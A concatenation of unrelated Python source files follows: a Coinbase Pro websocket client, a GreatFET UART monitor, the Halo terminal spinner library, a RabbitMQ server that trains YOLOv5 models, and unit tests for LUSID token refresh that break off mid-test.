import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from pymongo import MongoClient
from cbpro.cbpro_auth import get_auth_headers
import logging
LOGGER = logging.getLogger(__name__)
class WebsocketClient(object):
def __init__(
self,
url="wss://ws-feed.pro.coinbase.com",
products=None,
message_type="subscribe",
mongo_collection=None,
should_print=True,
auth=False,
api_key="",
api_secret="",
api_passphrase="",
# Make channels a required keyword-only argument; see pep3102
*,
# Channel options: ['ticker', 'user', 'matches', 'level2', 'full']
channels):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
def start(self):
self.stop = False
self.on_open()
self.thread = Thread(target=self._connect())
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
self.keepalive.start()
return self.ws
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
if self.channels is None:
self.channels = [{"name": "ticker", "product_ids": [product_id for product_id in self.products]}]
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
else:
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
LOGGER.info("Connected websocket")
self.ws = create_connection(self.url)
self.ws.send(json.dumps(sub_params))
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
LOGGER.debug("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
finally:
self.keepalive.join()
self.on_close()
def close(self):
self.stop = True # will only disconnect after next msg recv
self._disconnect() # force disconnect so threads can join
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
greatfet_uart.py
|
#!/usr/bin/env python3
#
# This file is part of GreatFET.
#
from __future__ import print_function, absolute_import
import os
import sys
import time
import queue
import select
import threading
import greatfet
from greatfet import GreatFET
from greatfet.utils import from_eng_notation, GreatFETArgumentParser
from greatfet.util.console import Console
from greatfet.interfaces.uart import UART
console = None
input_thread = None
termination_request = None
last_keycodes = bytearray()
def input_handler(console, input_queue, termination_request):
""" Thread body that gathers input from the user and enqueues it for processing. """
def should_check_for_data():
if os.name == 'posix':
return select.select([sys.stdin], [], [], 0) != ([], [], [])
else:
return True
while not termination_request.is_set():
# If we don't have data waiting, skip this iteration.
# This prevents us from entering a blocking read and sticking there
# after termination is desired.
if not should_check_for_data():
time.sleep(0.01)
continue
key = console.getkey()
input_queue.put(key)
def exit(code):
termination_request.set()
input_thread.join()
console.cleanup()
sys.exit(code)
def handle_special_functions(keycode):
""" Handles any special functions associated with the relevant key. """
global last_keycodes
# Keep track of the last four keycodes.
# Add any new keycodes to our list, deleting any existing keys that would push us past 4.
last_keycodes.extend(keycode)
while len(last_keycodes) > 2:
last_keycodes.pop(0)
# If the user's entered CTRL+A, CTRL+C, exit.
if last_keycodes.endswith(b"\x01\x03"):
exit(0)
def main():
""" Core command. """
global input_thread, termination_request, console
parity_modes = {
'none': UART.PARITY_NONE,
'odd': UART.PARITY_ODD,
'even': UART.PARITY_EVEN,
'one': UART.PARITY_STUCK_AT_ONE,
'zero': UART.PARITY_STUCK_AT_ZERO
}
# Set up a simple argument parser.
# TODO: support configurations such as '8n1'
parser = GreatFETArgumentParser(description="Simple GreatFET UART monitor.", verbose_by_default=True)
parser.add_argument('baud', nargs='?', type=from_eng_notation, default=115200, help="Baud rate; in symbols/second. Defaults to 115200.")
parser.add_argument('-d', '--data', type=int, default=8, help="The number of data bits per frame.")
parser.add_argument('-S', '--stop', type=int, default=1, help="The number of stop bits per frame.")
parser.add_argument('-P', '--parity', choices=parity_modes, default='none', help="The type of parity to use.")
parser.add_argument('-E', '--echo', action='store_true', help="If provided, local echo will be enabled.")
parser.add_argument('-N', '--no-newline-translation', action='store_false', dest='tr_newlines',
help="Provide this option to disable newline translation.")
args = parser.parse_args()
device = parser.find_specified_device()
# Grab our log functions.
log_function, log_error = parser.get_log_functions()
# Configure our UART.
if not hasattr(device, 'uart'):
log_error("This device doesn't appear to support the UART API. Perhaps it needs a firmware upgrade?")
sys.exit(-1)
# Notify the user that we're entering monitor mode.
log_function("Entering monitor mode. To terminate, type CTRL+A, then CTRL+C.")
# Create a console object.
console = Console()
console.setup()
# Create a thread to capture input data into a locally-processed queue.
input_queue = queue.Queue()
termination_request = threading.Event()
input_thread = threading.Thread(target=input_handler, args=(console, input_queue, termination_request))
input_thread.start()
# Configure our UART parameters.
device.uart.update_parameters(baud=args.baud, data_bits=args.data, stop_bits=args.stop, parity=parity_modes[args.parity])
# Generate our UART monitor.
while True:
# Grab any data from the serial port, and print it to the screen.
data = device.uart.read()
# If we're preforming newline translation, prepend a "\r" to any newline.
if args.tr_newlines and (data == b"\n"):
console.write_bytes(b"\r")
# Stick the UART data onscreen.
console.write_bytes(data)
# Grab any data from the user, and send it via serial.
try:
new_key = input_queue.get_nowait()
handle_special_functions(new_key)
# If local echo is on, print the character to our local console.
if args.echo:
sys.stdout.buffer.write(new_key)
if args.tr_newlines and (new_key == b"\n"):
device.uart.write(b"\r")
device.uart.write(new_key)
except queue.Empty:
pass
if __name__ == '__main__':
main()
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import re
import halo.cursor as cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (
colored_frame,
decode_utf_8_text,
get_environment,
get_terminal_columns,
is_supported,
is_text_type,
encode_utf_8_text,
)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = "\033[K"
SPINNER_PLACEMENTS = (
"left",
"right",
)
def __init__(
self,
text="",
color="cyan",
text_color=None,
spinner=None,
animation=None,
placement="left",
interval=-1,
enabled=True,
stream=sys.stdout,
):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
text_color : str, optional
Color of the text.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
# To reset Values in deleter
self.reset_values = {"text": text,
"color": color,
"text_color": text_color,
"spinner": spinner,
"animation": animation,
"placement": placement, }
self._symbol = " "
self._stop_persist = False
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._text_color = text_color
self._interval = (
int(interval) if int(interval) > 0 else self._spinner["interval"]
)
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self.enabled = enabled
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ("ipython", "jupyter"):
from IPython import get_ipython
ip = get_ipython()
ip.events.register("post_run_cell", clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner with show text at the end or not. For use in context managers."""
if self._stop_persist:
self.stop_and_persist(symbol=self._symbol, text=self.text)
else:
self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
self._change_text(f, *args, **kwargs)
return f(*args, **kwargs)
return wrapped
def _change_text(self, f, *args, **kwargs):
"""if you want to change text in decorator as your function is in a loop
* you have to use halo_iter as the argument of function
* if you want to show finished text use stop_persist:bool, stop_text:str and stop_symbol:str
Args:
f (callable): the function which supposed to be in a loop
"""
if "halo_iter" in kwargs:
if type(kwargs['halo_iter']) in [list, tuple, dict]:
main_text = self.text # text have curl-brackets like
# 'This is task {number}'
curl_brackets = re.findall(
r'\{([^\s\{\}]+)\}', main_text)
results = [] # store all return f(*args, **kwargs) in loop
for text in kwargs['halo_iter']:
#* type(text) is str in single curl-bracket
#* or list[str] in multiple curl-brackets
text_dict = dict(list(zip(curl_brackets, text))) if len(
curl_brackets) > 1 else dict([(curl_brackets[0], text)])
self.text = main_text.format(**text_dict)
results.append(f(*args, **kwargs))
if 'stop_text' in kwargs:
self._stop_persist = True
self.text = kwargs['stop_text']
if 'stop_symbol' in kwargs:
self._stop_persist = True
self._symbol = kwargs['stop_symbol']
else:
self._symbol = ' '
return results
else:
self._stop_persist = False
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@spinner.deleter
def spinner(self):
"""set spinner to None when delete spinner is
"""
self._spinner = self.reset_values["spinner"]
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text["original"]
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@text.deleter
def text(self):
self._text = self.reset_values["text"]
@property
def text_color(self):
"""Getter for text color property.
Returns
-------
str
text color value
"""
return self._text_color
@text_color.setter
def text_color(self, text_color):
"""Setter for text color property.
Parameters
----------
text_color : str
Defines the text color value for spinner
"""
self._text_color = text_color
@text_color.deleter
def text_color(self):
self._text_color = self.reset_values["text_color"]
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@color.deleter
def color(self):
self._color = self.reset_values["color"]
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(
placement, self.SPINNER_PLACEMENTS
)
)
self._placement = placement
@placement.deleter
def placement(self):
self.placement = self.reset_values["placement"]
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text["original"])
@animation.deleter
def animation(self):
self._animation = self.reset_values["animation"]
def _check_stream(self):
"""Returns whether the stream is open, and if applicable, writable
Returns
-------
bool
Whether the stream is open
"""
if self._stream.closed:
return False
try:
# Attribute access kept separate from invocation, to avoid
# swallowing AttributeErrors from the call which should bubble up.
check_stream_writable = self._stream.writable
except AttributeError:
pass
else:
return check_stream_writable()
return True
def _write(self, s):
"""Write to the stream, if writable
Parameters
----------
s : str
Characters to write to the stream
"""
if self._check_stream():
self._stream.write(s)
def _hide_cursor(self):
"""Disable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.hide(stream=self._stream)
def _show_cursor(self):
"""Re-enable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.show(stream=self._stream)
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners["dots"].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
return Spinners[spinner].value if all([is_text_type(spinner), spinner in Spinners.__members__]) else default_spinner
else:
return Spinners["line"].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner["frames"]])
# Subtract to the current terminal size the max spinner length
# (+1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - (max_spinner_length + 1)
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == "bounce":
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x: terminal_width + x])
frames.extend(list(reversed(frames)))
elif "marquee":
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + " " + \
stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x: terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[: terminal_width - 6] + " (...)"]
else:
frames = [stripped_text]
return {"original": text, "frames": frames}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
self._write("\r")
self._write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
if not self.enabled:
# in case we're disabled or stream is closed while still rendering,
# we render the frame and increment the frame index, so the proper
# frame is rendered if we're reenabled or the stream opens again.
return
self.clear()
frame = self.frame()
output = "\r{}".format(frame)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner["frames"]
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return "{0} {1}".format(
*[
(text_frame, frame)
if self._placement == "right"
else (frame, text_frame)
][0]
)
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text["frames"]) == 1:
if self._text_color:
return colored_frame(self._text["frames"][0], self._text_color)
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text["frames"][0]
frames = self._text["frames"]
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
if self._text_color:
return colored_frame(frame, self._text_color)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if self._spinner_id is not None:
return self
if not (self.enabled and self._check_stream()):
return self
self._hide_cursor()
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if self._spinner_thread and self._spinner_thread.is_alive():
self._stop_spinner.set()
self._spinner_thread.join()
if self.enabled:
self.clear()
self._frame_index = 0
self._spinner_id = None
self._show_cursor()
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=" ", text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text["original"]
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = "{0} {1}\n".format(
*[(text, symbol) if self._placement == "right" else (symbol, text)][0]
)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
return self
|
rpc_server.py
|
#!/usr/bin/env python
import pika
import json
import threading
import functools
from config import LOG_PREFIX, CLASSIFICATION, RECOGNITION, \
MULTI_RECOGNITION, START_MODEL_TRAINING_QUEUE, HOST, MODELS_DIR, \
EX_MODEL, KEY_MODEL_TRAINING_SUCCEED, KEY_MODEL_TRAINING_FAILED, \
DATASETS_DIR
from core.train_yolov5 import train_yolov5
from pathlib import Path
conn_parameters = pika.ConnectionParameters(host=HOST,
connection_attempts=20,
retry_delay=5)
connection = pika.BlockingConnection(conn_parameters)
channel = connection.channel()
channel.queue_declare(queue=START_MODEL_TRAINING_QUEUE, durable=True)
channel.exchange_declare(exchange=EX_MODEL, exchange_type="topic", durable=True)
def raise_not_implemeted(task):
raise RuntimeError(f"{task} inferer function is not implemented")
def ack_message(ch, delivery_tag):
"""Note that `channel` must be the same pika channel instance via which
the message being ACKed was retrieved (AMQP protocol constraint).
"""
if ch.is_open:
ch.basic_ack(delivery_tag)
else:
# Channel is already closed, so we can't ACK this message;
# log and/or do something that makes sense for your app in this case.
pass
def start_training(conn, ch, delivery_tag, body):
markup_result = json.loads(body.decode("utf-8"))
print(LOG_PREFIX, "Got markup result", markup_result)
markup_type = markup_result["type"]
markup_items = markup_result["items"]
markup_id = markup_result["markupId"]
model_id = markup_result["modelId"]
markup_items = [{ **item, "imageUrl": Path(DATASETS_DIR, item["imageUrl"]) } for item in markup_items]
# Создаем папку, куда будут записаны веса обученной модели
model_dir = Path(MODELS_DIR, model_id)
model_dir.mkdir(parents=True, exist_ok=True)
try:
if markup_type == MULTI_RECOGNITION:
train_yolov5(markup_items, model_dir)
elif markup_type == CLASSIFICATION:
raise RuntimeError(f"Training model for {markup_type} task is not implemented")
elif markup_type == RECOGNITION:
raise RuntimeError(f"Training model for {markup_type} task is not implemented")
else:
raise RuntimeError(f"Unknown markup type: {markup_type}")
except Exception as e:
print(e)
message_body = { "markupId": markup_id,
"modelId": model_id,
"type": markup_type }
routing_key = KEY_MODEL_TRAINING_FAILED
else:
message_body = { "markupId": markup_id,
"modelId": model_id,
"type": markup_type,
"weightsPath": str(Path(model_id, "weights.pt")) }
routing_key = KEY_MODEL_TRAINING_SUCCEED
publish_cb = functools.partial(ch.basic_publish,
exchange=EX_MODEL,
routing_key=routing_key,
body=json.dumps(message_body))
conn.add_callback_threadsafe(publish_cb)
ack_cb = functools.partial(ack_message, channel, delivery_tag)
conn.add_callback_threadsafe(ack_cb)
# Рассылаем сообщение о том, что модель успешно обучилась
# ch.basic_publish(exchange=EX_MODEL,
# routing_key=routing_key,
# body=json.dumps(message_body))
# ch.basic_ack(delivery_tag=delivery_tag)
def on_message(channel, method, header, body, args):
(connection, threads) = args
delivery_tag = method.delivery_tag
t = threading.Thread(target=start_training, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
channel.basic_qos(prefetch_count=1)
threads = []
on_message_callback = functools.partial(on_message, args=(connection, threads))
channel.basic_consume(queue=START_MODEL_TRAINING_QUEUE, on_message_callback=on_message_callback)
print(LOG_PREFIX, "Awaiting RPC requests")
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
# Wait for all to complete
for thread in threads:
thread.join()
connection.close()
|
test_token_refresh.py
|
import os
import unittest
from time import sleep, time
from threading import Thread
from datetime import datetime, timedelta
from lusid.utilities import ApiConfigurationLoader
from lusid.utilities.proxy_config import ProxyConfig
from lusid.utilities import RefreshingToken
from parameterized import parameterized
from utilities import CredentialsSource
from unittest.mock import patch
from utilities.temp_file_manager import TempFileManager
from utilities import MockApiResponse
source_config_details, config_keys = CredentialsSource.fetch_credentials(), CredentialsSource.fetch_config_keys()
class TokenRefresh(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.config = ApiConfigurationLoader.load(CredentialsSource.secrets_path())
def test_get_token(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
self.assertIsNotNone(refreshed_token)
@staticmethod
def force_refresh(refresh_token):
return f"{refresh_token}"
@staticmethod
def convert_to_http_date(datetime_value):
return datetime_value.strftime('%a, %d %b %Y %H:%M:%S GMT')
def test_get_token_with_proxy(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
TempFileManager.create_temp_file(secrets)
proxy_config = ProxyConfig(
address=secrets["proxy"]["address"],
username=secrets["proxy"]["username"],
password=secrets["proxy"]["password"]
)
proxies = proxy_config.format_proxy_schema()
with patch.dict('os.environ', {"HTTPS_PROXY": proxies["https"]}, clear=True):
proxy_url = os.getenv("HTTPS_PROXY", None)
if proxy_url is not None:
refreshed_token = RefreshingToken(api_configuration=self.config,
expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
def test_get_token_with_proxy_from_config(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
TempFileManager.create_temp_file(secrets)
refreshed_token = RefreshingToken(api_configuration=self.config,
expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
def test_refreshed_token_when_expired(self):
refreshed_token = RefreshingToken(api_configuration=self.config,
expiry_offset=3599) # set to 1s expiry
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
self.assertNotEqual(first_value, refreshed_token)
def test_token_when_refresh_token_expired_still_refreshes(self):
refreshed_token = RefreshingToken(api_configuration=self.config, expiry_offset=3599)
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
with patch("requests.post", side_effect=[
MockApiResponse(
json_data={
"error": "invalid_grant",
"error_description": "The refresh token is invalid or expired."
},
status_code=400
),
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]):
self.assertNotEqual(first_value, refreshed_token)
def test_token_when_not_expired_does_not_refresh(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
self.assertIsNotNone(refreshed_token)
# force de-referencing the token value
first_value = f"{refreshed_token}"
sleep(1)
self.assertEqual(first_value, refreshed_token)
def test_can_make_header(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
header = "Bearer " + refreshed_token
self.assertIsNotNone(header)
def test_use_refresh_token_multiple_threads(self):
refreshed_token = RefreshingToken(api_configuration=self.config)
thread1 = Thread(target=self.force_refresh, args=[refreshed_token])
thread2 = Thread(target=self.force_refresh, args=[refreshed_token])
thread3 = Thread(target=self.force_refresh, args=[refreshed_token])
with patch("requests.post") as identity_mock:
identity_mock.side_effect = lambda *args, **kwargs: MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 3600
},
status_code=200
)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
# Ensure that we only got an access token once
self.assertEqual(1, identity_mock.call_count)
def test_retries_on_429_status_code_initial_access_token(self):
"""
Ensures that in the event of a 429 HTTP Status Code being returned when communicating with an identity
provider, the request is retried.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
# Return a 429 on the first attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429
),
# Return a 200 on the second attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
self.assertEqual(identity_mock.call_count, 2)
def test_retries_on_429_status_code_using_refresh_token(self):
"""
Ensures that in the event of a 429 HTTP Status Code being returned when communicating with an identity
provider, the request is retried.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
identity_mock.side_effect=[
# Get initial access token
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 1 # Expires almost immediately
},
status_code=200
),
# Return a 429 on the second attempt
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429
),
# Return a 200 on the third attempt
MockApiResponse(
json_data={
"access_token": "mock_access_token_2",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
),
]
# Ensure that we were able to get the first access token
self.assertEqual(f"{refreshing_token}", "mock_access_token")
sleep(1) # Wait for initial token to expire
# Try and get access token again forcing refresh, if we can get it then retry was called
self.assertEqual(f"{refreshing_token}", "mock_access_token_2")
self.assertEqual(identity_mock.call_count, 3)
def test_does_not_retry_on_4xx_status_code_other_than_429(self):
"""
Ensures that we do not retry on other common 4xx status codes such as 400 - Bad Request
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
# Return a 400
MockApiResponse(
json_data={
"error": "invalid_grant",
"error_description": "The refresh token is invalid or expired."
},
status_code=400
),
]
# Ensure that a 400 is raised as an error and not retried
with self.assertRaises(ValueError) as bad_request_exception:
self.force_refresh(refreshing_token)
self.assertEqual(identity_mock.call_count, 1) # No retrying
self.assertIn("invalid_grant", str(bad_request_exception.exception))
def test_retries_on_429s_up_till_retry_limit(self):
"""
Ensures that the refreshing token only retries up until the retry limit to prevent
an infinite retry loop
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
refreshing_token.retry_limit = 2 # Override default to ensure test runs in reasonable amount of time
expected_requests = 1 + refreshing_token.retry_limit # Initial request plus expected number retries
with patch("requests.post") as identity_mock:
identity_mock.side_effect = [
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
headers={}
)
] * expected_requests # Return a 429 every time up until expected number of attempts
# Ensure that a an error is raised once reaching the retry limit
with self.assertRaises(ValueError) as retry_limit_error:
self.force_refresh(refreshing_token)
self.assertIn("Max retry limit", str(retry_limit_error.exception))
# Ensure that we only tried as many times as expected
self.assertEqual(expected_requests, identity_mock.call_count)
@parameterized.expand([
["One Attempt", 1, 2],
["Two Attempts", 2, 2 + 4],
["Three Attempts", 3, 2 + 4 + 8],
["Four Attempts", 4, 2 + 4 + 8 + 16],
])
def test_retries_on_429s_uses_exponential_back_off_if_no_retry_after_header(self, _, number_attempts_till_success,
expected_delay):
"""
Ensures that if no "Retry-After" header is provided then a simple exponential back-off strategy is used. This
is confirmed by checking that the time taken to successfully retrieve a token scales exponentially as the number
of retries increases.
"""
refreshing_token = RefreshingToken(api_configuration=self.config)
refreshing_token.backoff_base = 2 # Use a 2 second base for calculating back-off
with patch("requests.post", side_effect=[
# Return a 429 on the first attempts
MockApiResponse(
json_data={
"error": "rate_limit",
"error_description": "API rate limit exceeded."
},
status_code=429,
)] * number_attempts_till_success +
# Return a 200 on the last attempt
[
MockApiResponse(
json_data={
"access_token": "mock_access_token",
"refresh_token": "mock_refresh_token",
"expires_in": 60
},
status_code=200
)
]
):
start = time()
# Ensure that we were able to get the token, if not retrying this would be impossible
self.assertEqual(f"{refreshing_token}", "mock_access_token")
elapsed = time() - start
# Ensure that the elapsed time is as expected
self.assertEqual(int(elapsed), expected_delay)
@parameterized.expand([
["Zero", 0],
["Positive Int", 5],
["Positive Int2", 8]
